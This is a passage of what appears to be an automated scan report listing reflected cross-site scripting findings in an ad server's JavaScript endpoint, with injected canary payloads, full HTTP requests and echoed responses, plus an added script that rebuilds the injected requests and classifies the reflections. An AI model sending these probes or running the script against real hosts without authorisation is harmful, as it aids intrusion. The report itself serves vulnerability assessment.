This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//0/203f4d7c'%3bafdedb92150/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:51 GMT
Date: Sat, 26 Feb 2011 01:49:51 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=0;n=203f4d7c';afdedb92150;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="window
...[SNIP]...

1.80. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78b07'%3b973a986fd5 was submitted in the REST URL parameter 11. This input was echoed as 78b07';973a986fd5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/954278b07'%3b973a986fd5//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1648
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:56 GMT
Date: Sat, 26 Feb 2011 01:49:56 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=0;n=203;s=954278b07';973a986fd5;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="window.status
...[SNIP]...

1.81. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92286'%3bdf5245fe92e was submitted in the REST URL parameter 4. This input was echoed as 92286';df5245fe92e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/2124892286'%3bdf5245fe92e/0/0/203687986/203687986//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2591978
Expires: Mon, 28 Mar 2011 01:49:11 GMT
Date: Sat, 26 Feb 2011 01:49:33 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=2124892286';df5245fe92e;c=203687986,203687986;i=0;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\';
...[SNIP]...

1.82. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff6c9'%3b8c6997a9eb5 was submitted in the REST URL parameter 7. This input was echoed as ff6c9';8c6997a9eb5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986ff6c9'%3b8c6997a9eb5/203687986//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1667
Cache-Control: max-age=2591954
Expires: Mon, 28 Mar 2011 01:48:56 GMT
Date: Sat, 26 Feb 2011 01:49:42 GMT
Connection: close


var zzADS_CHAN = '203687986ff6c9';8c6997a9eb5';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

1.83. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c72d0'%3bb81f0cdff45 was submitted in the REST URL parameter 8. This input was echoed as c72d0';b81f0cdff45 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986c72d0'%3bb81f0cdff45//0/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2591985
Expires: Mon, 28 Mar 2011 01:49:29 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986c72d0';b81f0cdff45;i=0;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseO
...[SNIP]...

1.84. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43d0c'%3b225d52bbf59 was submitted in the REST URL parameter 9. This input was echoed as 43d0c';225d52bbf59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20119051/21248/0/0/203687986/203687986//043d0c'%3b225d52bbf59/203/9542//1/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1649
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687986';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20119051;x=21248;c=203687986,203687986;i=043d0c';225d52bbf59;n=203;s=9542;p=20830170;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://solutions.internet.com/3851_ITILv3-default" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseOut="
...[SNIP]...

1.85. http://e2.cdn.qnsr.com//cgi/k/20132865/1537/0/0/203687984/203687984//0/203/9542//1000002/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20132865/1537/0/0/203687984/203687984//0/203/9542//1000002/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5edfa'%3b1e8c5ab6679 was submitted in the REST URL parameter 7. This input was echoed as 5edfa';1e8c5ab6679 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20132865/1537/0/0/2036879845edfa'%3b1e8c5ab6679/203687984//0/203/9542//1000002/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1877
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:39 GMT
Date: Sat, 26 Feb 2011 01:49:39 GMT
Connection: close


var zzADS_CHAN = '2036879845edfa';1e8c5ab6679';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

1.86. http://e2.cdn.qnsr.com//cgi/k/20135122/1793/0/0/203687991/203687991//0/203/9542//5000005/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20135122/1793/0/0/203687991/203687991//0/203/9542//5000005/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d45'%3b635acea8c54 was submitted in the REST URL parameter 7. This input was echoed as f4d45';635acea8c54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20135122/1793/0/0/203687991f4d45'%3b635acea8c54/203687991//0/203/9542//5000005/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 6112
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close


var zzADS_CHAN = '203687991f4d45';635acea8c54';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

1.87. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2e4c'%3b75866eeb8cb was submitted in the REST URL parameter 10. This input was echoed as a2e4c';75866eeb8cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20140829/3585/0/0/203687989/203687989//0/203a2e4c'%3b75866eeb8cb/9542//4000004/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:53 GMT
Date: Sat, 26 Feb 2011 01:49:53 GMT
Connection: close


var zzADS_CHAN = '203687989';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
anguage=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203a2e4c';75866eeb8cb%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...
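Findings 1.87 to 1.99 are one pattern: a canary of the form prefix'%3bsuffix appended to a path segment comes back inside a single-quoted JavaScript string with the quote intact. The script below is added here as an illustration; it is not the scanner's code or the ad server's. It reproduces the two things a practitioner re-checks by hand: how "REST URL parameter N" maps onto the path (the Nth non-empty segment, which is why parameter 9 is the 0 after the double slash in 1.94) and how the echoed canary should be classified. The function names are assumptions, and the sample response bodies are constructed from the excerpts printed in 1.87.

```javascript
// Added example, not code from the report or from the QUAD ad server.
// Reproduces the REST-parameter numbering and the reflection check offline.
// Function names and the sample bodies below are assumptions; the path and
// payload shapes are taken from the requests printed in findings 1.87-1.99.

const REST_PATH = "//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js";

// "REST URL parameter N" is the Nth non-empty path segment, 1-based; the empty
// segments produced by "//" are skipped. Cross-check with the report: parameter 4
// is 3585 (finding 1.89) and parameter 9 is the 0 after the double slash (1.94).
function restParams(path) {
  return path.split("/").filter((seg) => seg.length > 0);
}

// Scanner payload shape: <prefix>'%3b<suffix>. The ' is sent raw because URL
// encoding leaves it alone; the ; is sent as %3b so the path stays well formed.
function makePayload(prefix, suffix) {
  return `${prefix}'%3b${suffix}`;
}

// Append the payload to the Nth REST parameter. Empty segments are preserved so
// the rebuilt request line matches the one the report shows.
function injectIntoParam(path, n, payload) {
  const raw = path.split("/");
  let seen = 0;
  for (let i = 0; i < raw.length; i++) {
    if (raw[i].length === 0) continue;
    seen += 1;
    if (seen === n) {
      raw[i] += payload;
      return raw.join("/");
    }
  }
  throw new RangeError(`path has only ${seen} REST parameters, asked for ${n}`);
}

// Classify how the canary came back. "breakout" is the report's finding: the
// quote survived unescaped, so it closes a single-quoted JS string literal.
// "escaped" (backslash) and "encoded" (%27) are what a fixed server would return.
function classifyReflection(body, prefix, suffix) {
  if (body.includes(`${prefix}';${suffix}`)) return "breakout";
  if (body.includes(`${prefix}\\';${suffix}`)) return "escaped";
  if (body.toLowerCase().includes(`${prefix}%27%3b${suffix}`.toLowerCase())) return "encoded";
  if (body.includes(prefix) || body.includes(suffix)) return "altered";
  return "absent";
}

// One finding end to end: the request line the scanner would send and the verdict
// for the body that came back.
function reproduceFinding(param, prefix, suffix, body) {
  return {
    requestLine: `GET ${injectIntoParam(REST_PATH, param, makePayload(prefix, suffix))} HTTP/1.1`,
    verdict: classifyReflection(body, prefix, suffix),
  };
}

// Constructed sample bodies, abridged from the 1.87 response (payload in REST
// parameter 10). The <SCRIPT ...> markup sits inside a JS string in the real
// response: note the \' around JavaScript1.1 and the ' + zz_trd + ' concatenation.
const PREFIX = "a2e4c";
const SUFFIX = "75866eeb8cb";
const SAMPLE_VULNERABLE = [
  "var zzADS_CHAN = '203687989';",
  "<SCRIPT language=\\'JavaScript1.1\\' SRC=\"http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203a2e4c';75866eeb8cb%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?\">",
].join("\n");
// The same body as a server that escapes for a JS string context would return it.
const SAMPLE_ESCAPED = SAMPLE_VULNERABLE.replace("a2e4c';", "a2e4c\\';");

console.log(reproduceFinding(10, PREFIX, SUFFIX, SAMPLE_VULNERABLE)); // verdict: "breakout"
console.log(reproduceFinding(10, PREFIX, SUFFIX, SAMPLE_ESCAPED));    // verdict: "escaped"
```

Against a live target the body would come from the HTTP response rather than the constructed sample. A "breakout" verdict shows only that the string literal was closed; as the report itself notes, it does not by itself prove that arbitrary code runs.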

1.88. http://e2.cdn.qnsr.com//cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20140829/3585/0/0/203687989/203687989//0/203/9542//4000004/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ec13'%3bb82047b1192 was submitted in the REST URL parameter 11. This input was echoed as 5ec13';b82047b1192 in the application's response.

